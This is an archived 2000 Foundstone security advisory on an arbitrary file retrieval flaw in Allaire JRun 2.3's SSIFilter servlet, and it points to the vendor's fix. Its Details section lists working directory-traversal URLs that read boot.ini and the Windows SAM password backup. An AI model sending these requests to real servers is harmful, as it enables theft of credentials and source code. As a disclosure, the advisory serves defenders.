OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Allaire JRUN 2.3 Arbitrary File Retrieval
From: Foundstone Labs (labsFOUNDSTONE.COM)
Date: Mon Oct 23 2000 - 13:28:28 CDT

                            Foundstone, Inc.
                        http://www.foundstone.com
                      "Securing the Dot Com World"

                           Security Advisory

                           Allaire JRUN 2.3

----------------------------------------------------------------------
FS Advisory ID: FS-102300-13-JRUN

Release Date: October 23, 2000

Product: Allaire JRUN 2.3

Vendor: Allaire Inc. (http://www.allaire.com)

Vendor Advisory: http://www.allaire.com/security/

Type: Arbitrary File Retrieval

Severity: High

Author: Shreeraj Shah (shreeraj.shahfoundstone.com)
                        Saumil Shah (saumil.shahfoundstone.com)
                        Stuart McClure (stuart.mcclurefoundstone.com)
                        Foundstone, Inc. (http://www.foundstone.com)

Operating Systems: All operating systems supported by JRUN

Vulnerable versions: JRUN Server v2.3

Foundstone Advisory:
http://www.foundstone.com/cgi-bin/display.cgi?Section_ID=13
----------------------------------------------------------------------

Description

        Multiple show code vulnerabilities exist in Allaire's JRUN
        Server 2.3 allowing an attacker to view the source code of any
        file within the web document root of the web server.

        Using the same vulnerability, it is also possible to retrieve
        arbitrary files that lie outside the web document root on the
        host operating system's file system.

Details

        JRun 2.3 uses Java Servlets to handle parsing of various types
        of pages (for example, HTML, JSP, etc). Based on the settings
        in the rules.properties and servlets.properties files, it is
        possible to invoke any servlet using the URL prefix
        "/servlet/".

        It is possible to use JRun's SSIFilter servlet to retrieve
        arbitrary files on the target system. The following two
        examples show the URLs that can be used to retrieve any
        arbitrary files:

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../t
est.jsp

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../boot.ini

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../winnt/repair/sam._
        http://jrun:8000/servlet/ssifilter/../../test.jsp
        http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini

http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._

        Note: It is assumed that JRun runs on host "jrun", port 8000.

Solution

        Follow the recommendations given in Allaire Security Bulletin
        ASB00-28, available at: http://www.allaire.com/security/

Credits

        We would also like to thank Allaire for their prompt reaction
        to this problem and their co-operation in heightening
        security awareness in the security community.

Disclaimer

        The information contained in this advisory is the copyright
        (C) 2000 of Foundstone, Inc. and believed to be accurate at
        the time of printing, but no representation or warranty is
        given, express or implied, as to its accuracy or completeness.
        Neither the author nor the publisher accepts any liability
        whatsoever for any direct, indirect or conquential loss or
        damage arising in any way from any use of, or reliance placed
        on, this information for any purpose. This advisory may be
        redistributed provided that no fee is assigned and that the
        advisory is not modified in any way.